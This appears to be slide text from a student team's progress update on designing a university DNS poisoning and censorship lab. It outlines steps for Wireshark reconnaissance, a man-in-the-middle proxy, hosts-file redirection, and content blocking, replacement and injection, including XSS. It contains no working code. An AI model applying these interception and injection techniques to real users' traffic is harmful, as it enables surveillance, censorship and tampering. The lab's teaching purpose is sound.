DNS POISONING + CENSORSHIP LABDUSTIN VANDENBERG, VIPUL AGARWAL, LIANG ZHAO

WHERE WERE WE LAST TIME?

• Rough outline of the content of the lab

• Real world connections

• General explanation of DNS

PROGRESS SINCE LAST UPDATE

• Researched various sources

• Helps our understanding

• Can provide resources in lab as hints

• Fleshed out ideas into main steps of lab

• Answered questions posed by Professor

SOURCES COMPILED

• DNS Archetecture

• The Hosts File and What it can do for you

• Decrypting SSL traffic with Wireshark and ways to prevent it

• Traffic Analysis with Wireshark

• Using Wireshark to Decode

SSL/TLS Packets

• Investigation of DHCP Packets using Wireshark

• Wireshark Lab: DNS

• Wireshark User’s Guide

• Man in the Middle Attack: Tutorial

BACKGROUND REQUIRED

• What is DNS

• Using Wireshark

• Socket Programming (C, C++, Java)

• Proxies

• Man-in-the-Middle Attack

• Cookies

Professor Egele asked about using compiled vs. non-compiled languages:• Compiled would be

better to simulate a “virus” which can be spread and execute remotely

STEP 1: RECONNAISSANCE

• Use Wireshark to examine the following about HTTP and DNS packets sent to your “target” website:

• What is the IP address associated with that website?

• Where is the traffic going from/to?

• What information is being sent in the HTTP packets?

• Is any of the information encrypted? If so, how does this complicate this process?

• What ports are being used?

Professor Egele asked about DNS vs HTTP

STEP 2: CONTROL SYSTEM

• Use Java, C, or C++ to create a man-in-the-middle proxy which does the following:

• Accepts incoming connections on the same port that we found was used before

• Can support outbound connections to the localhost

• Can read and edit the content which is received and sent between these connections

• This is the basic framework

• We will add more functionality later

STEP 3: REDIRECT

• Edit the hosts file to redirect traffic to your control system

• Use wireshark to ensure that the packets are being properly redirected

• How are the DNS packets different?

• How are the HTTP packets different?

• Can the client still communicate with the server?

• What are the limitations of this technique?

• What are the limitations on editing hosts files?

• Are there other ways to accomplish the same goal?

STEP 4: EXPLOIT

• Block all access to the “target” site.

• What are different ways this can be done?

• Redirect the user to a completely different site

• Monitor the traffic for “keywords”

• Send some sort of warning to the “attacker” whenever a site has those words

• Replace content from the site with completely new content

• Change/censor part of the content

• Add content to the site presented to the user

• Can this be used in the context of XSS? (hint: yes)

Suggested by Professor Egele

STEP 5: CONTEXT

• What sort of access does an attacker need to execute this?

• What protections are there to prevent this?

• Does SSL/HTTPS stop this? What can it do?

• How has this been applied on larger scales?

• Can this be done for an entire local network, rather than a single computer?

• How would one go about that?

NEXT STEPS

• Write out lab in Twiki with formatting and questions

• Test lab

• Figure out the timing/difficulty of each question

• Narrow down sources and decide what information to provide

QUESTIONS?